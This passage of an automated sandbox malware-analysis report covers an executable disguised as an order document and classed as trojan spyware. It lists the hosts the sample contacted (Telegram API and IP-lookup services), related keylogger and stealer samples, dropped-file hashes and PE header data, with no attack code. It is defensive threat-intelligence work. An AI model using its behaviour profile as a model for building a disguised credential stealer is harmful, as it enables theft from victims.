                                                      https://reallyfreegeoip.org/xml/JB#40044 Order.exe, 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.0000000003201000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        149.154.167.220
                                                        api.telegram.orgUnited Kingdom
                                                        62041TELEGRAMRUfalse
                                                        104.21.112.1
                                                        reallyfreegeoip.orgUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        132.226.247.73
                                                        checkip.dyndns.comUnited States
                                                        16989UTMEMUSfalse
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1586597
                                                        Start date and time:2025-01-09 11:37:05 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 7m 18s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:6
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:JB#40044 Order.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@3/4@3/3
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 99%
                                                        • Number of executed functions: 48
                                                        • Number of non-executed functions: 8
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded IPs from analysis (whitelisted): 2.22.50.131, 2.22.50.144, 199.232.210.172, 217.20.57.25, 217.20.57.23, 199.232.214.172, 172.202.163.200, 13.107.246.45
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        TimeTypeDescription
                                                        05:38:01API Interceptor6780901x Sleep call for process: RegAsm.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        149.154.167.220bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                          PO.exeGet hashmaliciousMassLogger RATBrowse
                                                            BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                  oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                        random.exeGet hashmaliciousCStealerBrowse
                                                                          random.exeGet hashmaliciousCStealerBrowse
                                                                            104.21.112.1wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            • 838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
                                                                            SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                            • beammp.com/phpmyadmin/
                                                                            132.226.247.73oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • checkip.dyndns.org/
                                                                            Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • checkip.dyndns.org/
                                                                            MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • checkip.dyndns.org/
                                                                            yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • checkip.dyndns.org/
                                                                            Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            bg.microsoft.map.fastly.netbc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                            • 199.232.210.172
                                                                            GT98765009064.xlsxGet hashmaliciousUnknownBrowse
                                                                            • 199.232.214.172
                                                                            SmartDeploy.exeGet hashmaliciousUnknownBrowse
                                                                            • 199.232.210.172
                                                                            82eqjqLrzE.exeGet hashmaliciousAsyncRATBrowse
                                                                            • 199.232.214.172
                                                                            EEdSGSana5.exeGet hashmaliciousAsyncRATBrowse
                                                                            • 199.232.210.172
                                                                            Magicleap-bonus disbursment.pdfGet hashmaliciousUnknownBrowse
                                                                            • 199.232.210.172
                                                                            eqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                            • 199.232.210.172
                                                                            Selvi Payroll Benefits & Bonus Agreementfdp.pdfGet hashmaliciousUnknownBrowse
                                                                            • 199.232.214.172
                                                                            atomxml.ps1Get hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                            • 199.232.210.172
                                                                            proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 199.232.214.172
                                                                            reallyfreegeoip.orgPO.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 104.21.112.1
                                                                            BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 188.114.96.3
                                                                            ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 188.114.97.3
                                                                            Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 188.114.97.3
                                                                            New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            api.telegram.orgbc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                            • 149.154.167.220
                                                                            PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 149.154.167.220
                                                                            BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 149.154.167.220
                                                                            spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                            • 149.154.167.220
                                                                            random.exeGet hashmaliciousCStealerBrowse
                                                                            • 149.154.167.220
                                                                            random.exeGet hashmaliciousCStealerBrowse
                                                                            • 149.154.167.220
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            TELEGRAMRUbc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                            • 149.154.167.220
                                                                            5dFLJyS86S.ps1Get hashmaliciousUnknownBrowse
                                                                            • 149.154.167.99
                                                                            PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 149.154.167.220
                                                                            BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 149.154.167.220
                                                                            spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                            • 149.154.167.220
                                                                            random.exeGet hashmaliciousCStealerBrowse
                                                                            • 149.154.167.220
                                                                            UTMEMUSpbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 132.226.247.73
                                                                            Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 132.226.247.73
                                                                            miori.ppc.elfGet hashmaliciousUnknownBrowse
                                                                            • 132.224.247.83
                                                                            ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 132.226.247.73
                                                                            document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            CLOUDFLARENETUShttps://booking.pathqerunknowns.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                            • 172.67.190.47
                                                                            colleague[1].htmGet hashmaliciousUnknownBrowse
                                                                            • 104.18.86.42
                                                                            https://identity.login-authenticate.cloud/Get hashmaliciousHTMLPhisherBrowse
                                                                            • 104.17.24.14
                                                                            bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                            • 104.16.185.241
                                                                            https://www.nwocipuk.com/Get hashmaliciousUnknownBrowse
                                                                            • 104.27.195.88
                                                                            message__51fa7b20_1571_b6cf_e82f_a6f0e2bfa4a2_jamestraversgarage_ie_.emlGet hashmaliciousUnknownBrowse
                                                                            • 1.1.1.1
                                                                            https://mo.iecxtug.ru/eoQpd/Get hashmaliciousUnknownBrowse
                                                                            • 104.17.25.14
                                                                            s7.mp4.htaGet hashmaliciousLummaCBrowse
                                                                            • 188.114.96.3
                                                                            dropper.exeGet hashmaliciousUnknownBrowse
                                                                            • 1.1.1.1
                                                                            https://t.co/qNQo33w8wDGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.18.95.41
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            54328bd36c14bd82ddaa0c04b25ed9adPO.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 104.21.112.1
                                                                            BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.112.1
                                                                            pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.112.1
                                                                            HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 104.21.112.1
                                                                            oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.112.1
                                                                            VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 104.21.112.1
                                                                            ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 104.21.112.1
                                                                            fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 104.21.112.1
                                                                            Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 104.21.112.1
                                                                            New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                            • 104.21.112.1
                                                                            3b5074b1b5d032e5620f69f9f700ff0ebc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                            • 149.154.167.220
                                                                            s7.mp4.htaGet hashmaliciousLummaCBrowse
                                                                            • 149.154.167.220
                                                                            chrtrome22.exeGet hashmaliciousXmrigBrowse
                                                                            • 149.154.167.220
                                                                            5dFLJyS86S.ps1Get hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            PO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            Purchase Order A2409002.scr.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            PO1178236.scr.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            Ref#103052.exeGet hashmaliciousXWormBrowse
                                                                            • 149.154.167.220
                                                                            NEW PURCHASE INQUIRY.scr.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            https://redduppgh.com/Get hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            No context
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                            Category:dropped
                                                                            Size (bytes):71954
                                                                            Entropy (8bit):7.996617769952133
                                                                            Encrypted:true
                                                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):328
                                                                            Entropy (8bit):3.260525030211451
                                                                            Encrypted:false
                                                                            SSDEEP:6:kKZAD9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:maDImsLNkPlE99SNxAhUe/3
                                                                            MD5:8C11FBE4BEFC184B215F6A85B54F675C
                                                                            SHA1:44E3FEA592DE7DD0082780D4A60503A2C03AA660
                                                                            SHA-256:5893412E85B1A7AC83D4F3E53D17966ACFD6779C80640643D441B8AC418E69B1
                                                                            SHA-512:1AAE0303FA1E13ED6559260ABF716C256FDD196152EECD3E4FAD2F0E22EC8FBA1FBEAA70ED117F9DE9F13658CDBBCE2022773A3FA2E00E3695B6BB76897477D6
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:p...... ...........V[U..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                            Process:C:\Users\user\Desktop\JB#40044 Order.exe
                                                                            File Type:CSV text
                                                                            Category:dropped
                                                                            Size (bytes):226
                                                                            Entropy (8bit):5.360398796477698
                                                                            Encrypted:false
                                                                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                            MD5:3A8957C6382192B71471BD14359D0B12
                                                                            SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                            SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                            SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                            Malicious:true
                                                                            Reputation:high, very likely benign file
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):695266
                                                                            Entropy (8bit):7.925218658498157
                                                                            Encrypted:false
                                                                            SSDEEP:12288:dU+YN/zsDAL0YlKCsI4jx/NmR/xo8bZ6+aM6NcqyuKsiI5oW1fSkxcFVz:dG5z6AL0cP3WlU/xfbk+aMBruKf3kxcn
                                                                            MD5:2B79459B1A56C63E8A366574B496324D
                                                                            SHA1:D2FB955A0AEB85DA9ADE6F075DFB65B83B5FAF3D
                                                                            SHA-256:77F0C8F860881520D979A301F0138FAD0F28D8914E9CA59FEA07B2DC27489C69
                                                                            SHA-512:874C126163440E5C8205F74798DDA2EDCD0E100D338F3572D2A0ED4EFB9A9DB0031FAF2D19B3AD3FD172765E3ABE200546B75BAC07D9CA9A0F456E5CB1D97CAA
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mU....v..I.s.w..XU......X...ZQe..Rr...d.`.....lD%H.1.XGK).$.U6.$... ...c......ko.[{Z...o.c......>F.s./...l...C.;%...O{..tO..:'.{X`.t.4:.....N.y/..C....&.|..L.?M.........Wl.h.q.~ant>..91ulL.sO...yb..Y..HL.-..H........=.#.....5...k...4.C....CfO....L...?..S.yx~9....c1U....s....[.}.j........2.1..@..i.Y..#..L}.........5.?........<.E.S........E.S.Mys.....,z.`..'.Wj..u.@..3f..wd...fj..{ ...wf....+........"c.m.N.[Z........]us....j.[n....e....93..rK...a.P..%)O0f..>7V.7'...Z..S|Q.k.T._.w..}R<...i......h<...ml..o......j.....K.=......{]_-yS..3..b.t....v....zM.....'..M..RLcA>.=o....e.]B,...%/.;;].../J.tw.*...J.-!..w..Z.k.....NWe.;^...qC.l..o.{...]....;\Yu.."..vL......./..;\...........%.\.Y.s.n....c~Y..K.._.....X..;...K{n.Y.10...).].O.?..%.E.^...=..h..3e...m.[..oui5..%..t.t..b.-.n.}.>,.&.k}.^..].MZ.u..*.O...Ly._\-."]7..)O.g..[.m..S...w6...nvQ..lza.)W..Z..z.
                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):4.547071448667567
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:JB#40044 Order.exe
                                                                            File size:345'088 bytes
                                                                            MD5:ecaa670aaa2b739b6891fd57deb79731
                                                                            SHA1:b2107d2b22b0c7cae6b5277bfcdbd71231c5d5a7
                                                                            SHA256:844031a92a7e8e372c63342a0b815cd8a7b7d30760c8d162b40a9febb0a5d73a
                                                                            SHA512:2c22d2b740dddb752789611835a29ce4aeefbc4a311fabe34b087dd548b539372eca89bd5460215b2fedb23144b9ec259c7403141a8063591fc5d97a2279c026
                                                                            SSDEEP:6144:TrppNYiu9CAsHWBngjaznnNgEAIW7boE/pLUcRZXiFGJsX4bO5:Tr9M9CAyongwnqEAIW7boaLUcRZXiFGa
                                                                            TLSH:41745D242DEA5029F173FF765BE4B8E6DA2FBB733B03545D10810B472A23942DD9253A
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..0...........N... ...`....@.. ....................................`................................
                                                                            Icon Hash:45e6beba9c92b6b4
                                                                            Entrypoint:0x444ec6
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0xD2A80BC6 [Mon Dec 29 10:07:02 2081 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x44e740x4f.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x10e70.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x580000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x44dd80x38.text
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
